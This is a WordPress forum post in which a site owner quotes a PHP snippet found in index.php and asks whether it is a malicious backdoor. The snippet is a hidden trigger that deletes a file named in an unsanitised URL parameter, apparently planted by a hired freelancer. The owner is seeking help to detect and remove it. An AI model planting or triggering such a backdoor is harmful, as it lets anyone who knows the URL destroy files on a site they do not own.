WordPress.org

Ready to get started?Download WordPress

Forums

backdoor (1 post)

  1. bobbyl76
    Member
    Posted 11 months ago #

    A coder friend found what he said was a type of kill switch backdoor in my index.php file. It was worked on by a freelancer from over seas. The code looks like this

    code
    if(isset($_GET['del']) && $_GET['del']=='yes'){

    $path = $_SERVER['SCRIPT_FILENAME'];
    $file = $_GET['filename'];

    $fullpath = "wp-content/themes/forest/".$file;

    $fpath = str_replace("index.php", $fullpath,$path);
    unlink($fpath);
    code

    He says this code could allow anyone with the url and knowledge of the code to delete my index page.

    Is this true?

    If it is. Beyond removing this code from the index.php, is there a way to check for any other kinds of code? I have "All in one WP Security" and it never found this exploit. My friend also suggested I find a plugin to check to see if any of the core wordpress files have been tampered with.

    Can anyone recommend something and/or advise if that code is malicious?

Reply

You must log in to post.

About this Topic